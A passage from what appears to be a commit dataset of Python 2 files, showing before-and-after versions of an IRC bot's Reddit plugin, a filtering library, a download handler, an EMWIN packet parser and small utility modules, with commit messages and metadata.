return {"reddit": "privmsg", "guess": "privmsg"}
def callback(self):
channel = self.channel
command = self.command
user = self.user
msg = self.message
type = self.type
isop = self.isop
if command == 'guess':
u = 'SwordOrSheath'
else:
try:
u = str(msg.split(' ', 1)[1])
except:
return self.msg(channel, "Please specify a subreddit!")
try:
req = urllib2.Request("https://www.reddit.com/r/" + u + "/new.json", headers={ 'User-Agent': 'UNIX:the_kgb:reddit https://github.com/stqism/THE_KGB-apps' })
fd = urllib2.urlopen(req)
reddit_api = json.loads(fd.read())
fd.close()
cringe = []
for i in reddit_api['data']['children']:
url = i['data']['url']
title = i['data']['title']
selfpost = bool(i['data']['is_self'])
post = "https://reddit.com" + i['data']['permalink']
if 'imgur' in url:
if 'http://i.imgur.com' in url: #force https
url = 'https://i.imgur.com/%s' % (url.split('/')[3])
if 'http://' in url and '/a/' not in url: #direct URLs
if 'gallery' in url:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[4])
else:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[3])
cringe.append([title, url, post])
item = random.choice(cringe)
if command == 'guess':
try:
u = str(msg.split(' ', 1)[1])
return self.msg(channel, u + ": Am I male or female? " + item[1])
except:
return self.msg(channel, "Am I male or female? " + item[1])
else:
if not selfpost:
via = " (via: " + item[2] + ")"
return self.msg(channel, str(item[0] + " " + item[1] + via))
else:
return self.msg(channel, str(item[0] + " " + item[1]))
except Exception, e:
return self.msg('#the_kgb', str(e))
class api:
def msg(self, channel, text):
return "[%s] %s" % (channel, text)
if __name__ == "__main__":
api = api()
c = "#test"
setattr(api, 'isop', True)
setattr(api, 'type', 'privmsg')
setattr(api, 'command', 'reddit')
setattr(api, 'user', 'joe!username@hostmask')
setattr(api, 'channel', c)
setattr(api, 'message', '^reddit')
if callback(api) != '[%s] Please specify a subreddit!' % (c):
print '[TESTFAIL] no arguments'
exit(1)
setattr(api, 'message', '^reddit fatpeoplehate')
if callback(api) != '[#the_kgb] HTTP Error 404: Not Found':
print '[TESTFAIL] error catcher'
exit(1)
setattr(api, 'message', '^reddit fatlogic')
if not callback(api).startswith('[%s] ' % (c)):
print '[TESTFAIL] Subreddit loader'
exit(1)
setattr(api, 'message', '^guess')
setattr(api, 'command', 'guess')
if not callback(api).startswith('[%s] Am I male or female?' % (c)):
print '[TESTFAIL] guess no user'
exit(1)
n = 'bob'
setattr(api, 'message', '^guess %s' % (n))
if not callback(api).startswith('[%s] %s: Am I male or female?' % (c, n)):
print '[TESTFAIL] guess with user'
exit(1)
| import json, random, urllib2
def declare():
return {"reddit": "privmsg", "guess": "privmsg"}
def callback(self):
channel = self.channel
command = self.command
user = self.user
msg = self.message
type = self.type
isop = self.isop
if command == 'guess':
u = 'SwordOrSheath'
else:
try:
u = str(msg.split(' ', 1)[1])
except:
return self.msg(channel, "Please specify a subreddit!")
try:
req = urllib2.Request("https://www.reddit.com/r/" + u + "/new.json", headers={ 'User-Agent': 'UNIX:the_kgb:reddit https://github.com/stqism/THE_KGB-apps' })
fd = urllib2.urlopen(req)
reddit_api = json.loads(fd.read())
fd.close()
cringe = []
for i in reddit_api['data']['children']:
url = i['data']['url']
title = i['data']['title']
selfpost = bool(i['data']['is_self'])
post = "https://reddit.com" + i['data']['permalink']
if 'imgur' in url:
if 'http://i.imgur.com' in url: #force https
url = 'https://i.imgur.com/%s' % (url.split('/')[3])
if 'http://' in url and '/a/' not in url: #direct URLs
if 'gallery' in url:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[4])
else:
url = 'https://i.imgur.com/%s.jpg' % (url.split('/')[3])
cringe.append([title, url, post])
item = random.choice(cringe)
if command == 'guess':
try:
u = str(msg.split(' ', 1)[1])
return self.msg(channel, u + ": Am I male or female? " + item[1])
except:
return self.msg(channel, "Am I male or female? " + item[1])
else:
if not selfpost:
via = " (via: " + item[2] + ")"
return self.msg(channel, str(item[0] + " " + item[1] + via))
else:
return self.msg(channel, str(item[0] + " " + item[1]))
except Exception, e:
return self.msg('#the_kgb', str(e))
class api:
def msg(self, channel, text):
return "[%s] %s" % (channel, text)
if __name__ == "__main__":
api = api()
u = "joe!username@hostmask"
c = '#test'
if callback(api, '', True, channel=c, user=u, command='reddit', msg='^reddit') != '[%s] Please specify a subreddit!' % (c):
print '[TESTFAIL] no arguments'
exit(1)
if callback(api, '', True, channel=c, user=u, command='reddit', msg='^reddit fatpeoplehate') != '[#the_kgb] HTTP Error 404: Not Found':
print '[TESTFAIL] error catcher'
exit(1)
if not callback(api, '', True, channel=c, user=u, command='reddit', msg='^reddit fatlogic').startswith('[%s] ' % (c)):
print '[TESTFAIL] Subreddit loader'
exit(1)
if not callback(api, '', True, channel=c, user=u, command='guess', msg='^guess').startswith('[%s] Am I male or female?' % (c)):
print '[TESTFAIL] guess no user'
exit(1)
n = 'bob'
if not callback(api, '', True, channel=c, user=u, command='guess', msg='^guess %s' % (n)).startswith('[%s] %s: Am I male or female?' % (c, n)):
print '[TESTFAIL] guess with user'
exit(1)
| Python | 0 |
acd0b8803579ece5b52a3158c05140ff1287f0be | Handle string values better in FilterComparison.__str__ | odin/filtering.py | odin/filtering.py | # -*- coding: utf-8 -*-
import six
from .traversal import TraversalPath
class FilterAtom(object):
"""
Base filter statement
"""
def __call__(self, resource):
raise NotImplementedError()
def any(self, collection):
return any(self(r) for r in collection)
def all(self, collection):
return all(self(r) for r in collection)
class FilterChain(FilterAtom):
operator_name = ''
check_operator = all
def __init__(self, *atoms):
self._atoms = list(atoms)
def __add__(self, other):
if isinstance(other, self.__class__):
return self.__class__(*self._atoms + other._atoms)
elif isinstance(other, FilterComparison):
self._atoms.append(other)
return self
raise TypeError("{} not supported for this operation".format(other))
def __call__(self, resource):
return self.check_operator(a(resource) for a in self._atoms)
def __str__(self):
pin = " {} ".format(self.operator_name)
return "({})".format(pin.join(str(a) for a in self._atoms))
class And(FilterChain):
operator_name = 'AND'
check_operator = all
class Or(FilterChain):
operator_name = 'OR'
check_operator = any
class FilterComparison(FilterAtom):
"""
Base class for filter operator atoms
"""
operator_symbol = ''
def __init__(self, field, value, operation=None):
self.field = TraversalPath.parse(field)
self.value = value
self.operation = operation
def __call__(self, resource):
try:
value = self.field.get_value(resource)
except KeyError:
return False
else:
if self.operation:
value = self.operation(value)
return self.compare(value)
def __str__(self):
value = self.value
if isinstance(self.value, six.string_types):
value = '"{}"'.format(value)
if self.operation:
op_name = getattr(self.operation, 'name', self.operation.__name__)
return "{}({}) {} {}".format(op_name, self.field, self.operator_symbol, value)
else:
return "{} {} {}".format(self.field, self.operator_symbol, value)
def compare(self, value):
raise NotImplementedError()
class Equal(FilterComparison):
operator_symbol = '=='
def compare(self, value):
return value == self.value
class NotEqual(FilterComparison):
operator_symbol = '!='
def compare(self, value):
return value != self.value
class LessThan(FilterComparison):
operator_symbol = '<'
def compare(self, value):
return value < self.value
class LessThanOrEqual(FilterComparison):
operator_symbol = '<='
def compare(self, value):
return value <= self.value
class GreaterThan(FilterComparison):
operator_symbol = '>'
def compare(self, value):
return value > self.value
class GreaterThanOrEqual(FilterComparison):
operator_symbol = '>='
def compare(self, value):
return value >= self.value
| # -*- coding: utf-8 -*-
from .traversal import TraversalPath
class FilterAtom(object):
"""
Base filter statement
"""
def __call__(self, resource):
raise NotImplementedError()
def any(self, collection):
return any(self(r) for r in collection)
def all(self, collection):
return all(self(r) for r in collection)
class FilterChain(FilterAtom):
operator_name = ''
check_operator = all
def __init__(self, *atoms):
self._atoms = list(atoms)
def __add__(self, other):
if isinstance(other, self.__class__):
return self.__class__(*self._atoms + other._atoms)
elif isinstance(other, FilterComparison):
self._atoms.append(other)
return self
raise TypeError("{} not supported for this operation".format(other))
def __call__(self, resource):
return self.check_operator(a(resource) for a in self._atoms)
def __str__(self):
pin = " {} ".format(self.operator_name)
return "({})".format(pin.join(str(a) for a in self._atoms))
class And(FilterChain):
operator_name = 'AND'
check_operator = all
class Or(FilterChain):
operator_name = 'OR'
check_operator = any
class FilterComparison(FilterAtom):
"""
Base class for filter operator atoms
"""
operator_symbol = ''
def __init__(self, field, value, operation=None):
self.field = TraversalPath.parse(field)
self.value = value
self.operation = operation
def __call__(self, resource):
try:
value = self.field.get_value(resource)
except KeyError:
return False
else:
if self.operation:
value = self.operation(value)
return self.compare(value)
def __str__(self):
if self.operation:
op_name = getattr(self.operation, 'name', self.operation.__name__)
return "{}({}) {} {}".format(op_name, self.field, self.operator_symbol, self.value)
else:
return "{} {} {}".format(self.field, self.operator_symbol, self.value)
def compare(self, value):
raise NotImplementedError()
class Equal(FilterComparison):
operator_symbol = '=='
def compare(self, value):
return value == self.value
class NotEqual(FilterComparison):
operator_symbol = '!='
def compare(self, value):
return value != self.value
class LessThan(FilterComparison):
operator_symbol = '<'
def compare(self, value):
return value < self.value
class LessThanOrEqual(FilterComparison):
operator_symbol = '<='
def compare(self, value):
return value <= self.value
class GreaterThan(FilterComparison):
operator_symbol = '>'
def compare(self, value):
return value > self.value
class GreaterThanOrEqual(FilterComparison):
operator_symbol = '>='
def compare(self, value):
return value >= self.value
| Python | 0.000019 |
178bde1703bbb044f8af8c70a57517af4490a3c0 | Fix duplicate cookie issue and header parsing | databot/handlers/download.py | databot/handlers/download.py | import time
import requests
import bs4
import cgi
from databot.recursive import call
class DownloadErrror(Exception):
pass
def dump_response(response):
return {
'headers': dict(response.headers),
'cookies': response.cookies.get_dict(),
'status_code': response.status_code,
'encoding': response.encoding,
'content': response.content,
}
def download(url, delay=None, update=None, **kwargs):
update = update or {}
def func(row):
if delay is not None:
time.sleep(delay)
kw = call(kwargs, row)
_url = url(row)
response = requests.get(_url, **kw)
if response.status_code == 200:
value = dump_response(response)
for k, fn in update.items():
value[k] = fn(row)
yield _url, value
else:
raise DownloadErrror('Error while downloading %s, returned status code was %s, response content:\n\n%s' % (
_url, response.status_code, response.content,
))
return func
def get_content(data):
content_type_header = data.get('headers', {}).get('Content-Type', '')
content_type, params = cgi.parse_header(content_type_header)
if content_type == 'text/html':
soup = bs4.BeautifulSoup(data['content'], 'lxml')
return data['content'].decode(soup.original_encoding)
else:
return data['content']
| import time
import requests
import bs4
from databot.recursive import call
class DownloadErrror(Exception):
pass
def dump_response(response):
return {
'headers': dict(response.headers),
'cookies': dict(response.cookies),
'status_code': response.status_code,
'encoding': response.encoding,
'content': response.content,
}
def download(url, delay=None, update=None, **kwargs):
update = update or {}
def func(row):
if delay is not None:
time.sleep(delay)
kw = call(kwargs, row)
_url = url(row)
response = requests.get(_url, **kw)
if response.status_code == 200:
value = dump_response(response)
for k, fn in update.items():
value[k] = fn(row)
yield _url, value
else:
raise DownloadErrror('Error while downloading %s, returned status code was %s, response content:\n\n%s' % (
_url, response.status_code, response.content,
))
return func
def get_content(data):
content_type = data.get('headers', {}).get('Content-Type')
if content_type == 'text/html':
soup = bs4.BeautifulSoup(data['content'], 'lxml')
return data['content'].decode(soup.original_encoding)
else:
return data['content']
| Python | 0.000001 |
5de8209ec751fec9178a86e713393d8eafb7a124 | Abort when strange things happen | emwin.py | emwin.py | from time import strptime, mktime, time
import logging
import sys
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s'))
log = logging.getLogger('emwin')
log.addHandler(handler)
log.setLevel(logging.DEBUG)
class Connection(object):
def __init__(self, sock):
self.sock = sock
self.ident = 'ByteBlast Client|NM-emwin@synack.me|V1'
self.ident = ''.join([chr(ord(x) ^ 0xFF) for x in self.ident])
def __iter__(self):
buf = ''
last_ident = 0
while True:
now = int(time())
if (now - last_ident) > 300:
log.info('Sending ident packet')
last_ident = now
self.sock.sendall(self.ident)
buf += self.sock.recv(1116)
if buf == '':
break
while len(buf) >= 1116:
if not buf.startswith('\xFF\xFF\xFF\xFF\xFF\xFF'):
offset = buf.find('\xFF\xFF\xFF\xFF\xFF\xFF')
if offset == -1:
log.info('Sync marker missing! Abort!')
break
buf = ''
buf = buf[offset:]
log.info('Discarding %i bytes before sync marker' % offset)
try:
packet = Packet(buf[:1116])
log.debug(str(packet))
yield packet
except:
log.error(sys.exc_info()[1])
break
buf = buf[1116:]
log.error('Connection closed by remote host')
self.sock.close()
class Packet(object):
def __init__(self, data):
self.data = data
self.parse()
def parse(self):
self.data = ''.join([chr(ord(x) ^ 0xFF) for x in self.data])
self.header = self.parse_header(self.data[:86])
self.filename = self.header['PF']
self.block = int(self.header['PN'])
self.total_blocks = int(self.header['PT'])
self.checksum = int(self.header['CS'])
self.timestamp = int(mktime(strptime(self.header['FD'], '%m/%d/%Y %I:%M:%S %p')))
self.payload = self.data[86:-6]
if len(self.payload) != 1024:
raise ValueError('Packet is the wrong size!')
self.verify_checksum()
def parse_header(self, data):
if data[:6] != ('\x00' * 6):
raise ValueError('Invalid packet header')
data = data[6:]
header = data.rstrip(' \r\n')
header = header.split('/', 5)
header = (x for x in header if x)
header = ((x[:2], x[2:].strip(' ')) for x in header)
return dict(header)
def verify_checksum(self):
checksum = sum([ord(x) for x in self.payload])
if int(self.checksum) != checksum:
raise ValueError('Checksum failed! Got: %i Expecting: %i' % (checksum, self.checksum))
def dict(self):
d = {}
for field in ('filename', 'block', 'total_blocks', 'timestamp'):
value = getattr(self, field)
d[field] = value
return d
def __str__(self):
return '%s (%i/%i)' % (self.filename, self.block, self.total_blocks)
class FileAssembler(object):
def __init__(self, filename, callback=None):
self.filename = filename
self.callback = callback
self.parts = {}
def add_part(self, packet):
self.parts[packet.block] = packet.payload
self.check_parts(packet)
def check_parts(self, packet):
if self.callback is None:
return
if not None in [self.parts.get(i, None) for i in range(1, packet.total_blocks + 1)]:
parts = self.parts.items()
parts.sort(key=lambda x: x[0])
content = ''.join([x[1] for x in parts])
if not self.filename.endswith('.ZIS'):
content = content.rstrip('\x00')
self.content = content
self.callback(self.filename, self.content)
| from time import strptime, mktime
import logging
import sys
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s'))
log = logging.getLogger('emwin')
log.addHandler(handler)
log.setLevel(logging.DEBUG)
class Connection(object):
def __init__(self, sock):
self.sock = sock
def __iter__(self):
buf = ''
while True:
buf += self.sock.recv(1116)
if buf == '':
break
while len(buf) >= 1116:
if not buf.startswith('\xFF\xFF\xFF\xFF\xFF\xFF'):
offset = buf.find('\xFF\xFF\xFF\xFF\xFF\xFF')
if offset == -1:
log.info('Sync marker missing! Resetting buffer!')
buf = ''
continue
buf = buf[offset:]
log.info('Discarding %i bytes before sync marker' % offset)
try:
packet = Packet(buf[:1116])
log.debug(str(packet))
yield packet
except:
log.error(sys.exc_info()[1])
buf = buf[1116:]
log.error('Connection closed by remote host')
self.sock.close()
class Packet(object):
def __init__(self, data):
self.data = data
self.parse()
def parse(self):
self.data = ''.join([chr(ord(x) ^ 0xFF) for x in self.data])
self.header = self.parse_header(self.data[:86])
self.filename = self.header['PF']
self.block = int(self.header['PN'])
self.total_blocks = int(self.header['PT'])
self.checksum = int(self.header['CS'])
self.timestamp = int(mktime(strptime(self.header['FD'], '%m/%d/%Y %I:%M:%S %p')))
self.payload = self.data[86:-6]
if len(self.payload) != 1024:
raise ValueError('Packet is the wrong size!')
self.verify_checksum()
def parse_header(self, data):
if data[:6] != ('\x00' * 6):
raise ValueError('Invalid packet header')
data = data[6:]
header = data.rstrip(' \r\n')
header = header.split('/', 5)
header = (x for x in header if x)
header = ((x[:2], x[2:].strip(' ')) for x in header)
return dict(header)
def verify_checksum(self):
checksum = sum([ord(x) for x in self.payload])
if int(self.checksum) != checksum:
raise ValueError('Checksum failed! Got: %i Expecting: %i' % (checksum, self.checksum))
def dict(self):
d = {}
for field in ('filename', 'block', 'total_blocks', 'timestamp'):
value = getattr(self, field)
d[field] = value
return d
def __str__(self):
return '%s (%i/%i)' % (self.filename, self.block, self.total_blocks)
class FileAssembler(object):
def __init__(self, filename, callback=None):
self.filename = filename
self.callback = callback
self.parts = {}
def add_part(self, packet):
self.parts[packet.block] = packet.payload
self.check_parts(packet)
def check_parts(self, packet):
if self.callback is None:
return
if not None in [self.parts.get(i, None) for i in range(1, packet.total_blocks + 1)]:
parts = self.parts.items()
parts.sort(key=lambda x: x[0])
content = ''.join([x[1] for x in parts])
if not self.filename.endswith('.ZIS'):
content = content.rstrip('\x00')
self.content = content
self.callback(self.filename, self.content)
| Python | 0.000008 |
32446090486db452342ec76606d28a05f6736e81 | Update tracking.py | panoptes/state/states/default/tracking.py | panoptes/state/states/default/tracking.py | import time
def on_enter(event_data):
""" The unit is tracking the target. Proceed to observations. """
pan = event_data.model
pan.say("Checking our tracking")
next_state = 'parking'
try:
pan.say("I'm adjusting the tracking rate")
#pan.observatory.update_tracking()
next_state = 'observe'
pan.say("Done with tracking adjustment, going to observe")
# Trying to prevent stall
time.sleep(2)
except Exception as e:
pan.logger.warning("Tracking problem: {}".format(e))
pan.say("Yikes! A problem while updating our tracking.")
pan.goto(next_state)
| import time
def on_enter(event_data):
""" The unit is tracking the target. Proceed to observations. """
pan = event_data.model
pan.say("Checking our tracking")
next_state = 'parking'
try:
pan.say("I'm adjusting the tracking rate")
pan.observatory.update_tracking()
next_state = 'observe'
pan.say("Done with tracking adjustment, going to observe")
# Trying to prevent stall
time.sleep(2)
except Exception as e:
pan.logger.warning("Tracking problem: {}".format(e))
pan.say("Yikes! A problem while updating our tracking.")
pan.goto(next_state)
| Python | 0.000001 |
cbae828ee9eb91a2373a415f1a1521fb5dee3100 | Add method to generate list of abscissa dicts | datac/main.py | datac/main.py | # -*- coding: utf-8 -*-
import copy
def init_abscissa(params, abscissae, abscissa_name):
"""
List of dicts to initialize object w/ calc method
This method generates a list of dicts; each dict is sufficient to initialize an object featuring a calculator method of interest. This list can be thought of as the abscissae of a set of data. Each dict will contain data which remains constant for each calculation, but it nonetheless required to initialize the object. Each dict will also contain a datum which is the abscissa for the calculation and is also required to initialize the object.
:param dict params: Static parameters required to initialize the object featuring the ordinate calculator method.
:param list abscissae: Independent variable also required to initialize object featuring the ordinate calculator method.
:param str abscissa_name: Dictionary key for the abscissa name.
"""
dict_list = []
for abscissa in abscissae:
param_dict = copy.copy(params)
param_dict[abscissa_name] = abscissa
param_dict["abscissa_name"] = abscissa_name
dict_list.append(param_dict)
return dict_list
| # -*- coding: utf-8 -*-
import copy
| Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.